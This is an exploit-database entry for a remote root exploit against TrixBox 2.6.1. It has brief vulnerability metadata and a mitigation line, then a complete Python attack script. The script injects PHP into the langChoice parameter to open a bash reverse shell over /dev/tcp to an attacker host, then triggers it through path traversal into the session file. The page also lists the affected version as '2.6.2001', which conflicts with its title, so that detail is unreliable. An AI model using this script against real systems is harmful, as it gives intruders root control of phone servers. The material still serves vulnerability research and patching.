TrixBox 2.6.1 langChoice remote root exploit

vendor:

TrixBox

by:

Muts from Offensive-Security.com

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: TrixBox

Affected Version From: 2.6.2001

Affected Version To: 2.6.2001

Patch Exists: YES

Related CWE: N/A

CPE: a:trixbox:trixbox:2.6.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2008

TrixBox 2.6.1 langChoice remote root exploit

This exploit is a remote code execution vulnerability in TrixBox 2.6.1. It allows an attacker to inject malicious code into the session file, which is then executed by the server. This exploit was discovered by Jean-Michel BESNARD and published by Offensive Security. It requires the attacker to have access to the target server and the ability to send crafted HTTP requests.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a newer version of TrixBox that is not affected by this exploit.

Source

Exploit-DB raw data:

#!/usr/bin/python
# TrixBox 2.6.1 langChoice remote root exploit
# muts from offensive-security.com
# All credits to Jean-Michel BESNARD <jmbesnard@gmail.com>
# Same same, but different.
# http://www.offensive-security.com/0day/trixbox.py.txt
##################################################################################################
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# uname -a
# Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 i686 i386 GNU/Linux
##################################################################################################

import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")

if (len(sys.argv)!=5):
	print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
	exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer

def send_post(host,port,input):
	s = socket(AF_INET, SOCK_STREAM)
	s.connect((host, port))
	s.send(input)
	output=s.recv(1024)
	s.close()
	return output

def find_sessionid(http_output):
	headers=re.split("\n",http_output)
	for header in headers:
	        if re.search("Set-Cookie",header):
           	    	cook=header.split(" ")
			sessionid=cook[1][10:42]
	                print "[*] Session ID is %s" % sessionid
			return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>" 
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"

# milw0rm.com [2008-07-12]